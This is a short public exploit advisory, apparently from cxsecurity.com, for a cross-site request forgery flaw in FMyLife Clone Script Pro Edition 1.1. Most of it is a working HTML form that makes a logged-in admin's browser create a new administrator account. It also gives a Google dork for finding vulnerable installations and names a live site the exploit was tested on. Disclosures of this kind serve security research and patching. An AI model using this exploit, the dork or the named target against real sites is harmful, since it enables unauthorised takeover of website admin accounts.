FMyLife Clone Script Pro Edition 1.1 Cross Site Request Forgery

Published
Credit
Risk
2017.01.11
Ihsan Sencan
Low
CWE
CVE
Local
Remote
CWE-352
N/A
No
Yes
Dork: FMyLife Clone Script

# # # # #
# Vulnerability: Add Admin Exploit (Add/Edit/Delete/ Category, Admin Vs...)
# Google Dork: FMyLife Clone Script
# Date:10.01.2017
# Vendor Homepage: http://alstrasoft.com/fmylife-pro.htm
# Tested on: http://www.tellaboutit.com/admin/
# Script Name: FMyLife Clone Script (Pro Edition)
# Script Version: 1.1
# Script Buy Now: http://www.hotscripts.com/listing/fmylife-clone-script-pro-edition/
# Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Mail : ihsan[beygir]ihsan[nokta]net
# # # # #
#Exploit :
<html>
<body>
<h2>Add an Administrator</h2>
<form action="http://localhost/[PATH]/admin/" method="post">
<div id="add-admin-form">
<input type="hidden" name="action" value="add-admin" />
<label for="username">Username:</label>
<input type="text" id="username" name="admin-username" value="" />
<div class="spacer"></div>
<label for="password">Password:</label>
<input type="password" id="password" name="admin-password" value="" />
<div class="spacer"></div>
<input type="image" src="add-administrator.png" name="add-admin" id="add-admin" value="Add Administrator" />
</div>
</form>
</body>
</html>
# # # # #


See this note in RAW Version

 
Bugtraq RSS
Bugtraq
 
CVE RSS
CVEMAP
 
REDDIT
REDDIT
 
DIGG
DIGG
 
LinkedIn
LinkedIn


Copyright 2017, cxsecurity.com